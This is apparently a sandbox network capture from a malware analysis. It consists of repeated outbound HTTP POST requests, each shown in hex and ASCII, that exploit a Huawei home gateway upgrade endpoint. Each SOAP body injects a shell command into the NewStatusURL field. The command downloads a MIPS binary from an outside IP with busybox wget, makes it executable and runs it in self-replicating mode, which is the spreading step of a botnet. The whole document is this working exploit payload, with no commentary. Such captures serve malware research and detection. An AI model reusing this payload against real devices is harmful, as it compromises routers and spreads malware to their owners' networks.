                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1746192.168.2.233570841.97.58.17737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583389997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1747192.168.2.2357548104.21.234.737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583389997 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1748192.168.2.233572690.96.42.19637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583412886 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1749192.168.2.2346104197.139.201.6537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583462954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1750192.168.2.2341352157.194.240.13337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583471060 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1751192.168.2.2355886157.33.102.8737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583511114 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1752192.168.2.2351928197.125.89.24737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583512068 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1753192.168.2.233533241.81.253.4737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583520889 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1754192.168.2.234819441.68.156.3137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583532095 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1755192.168.2.234521241.214.234.2437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.583534002 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
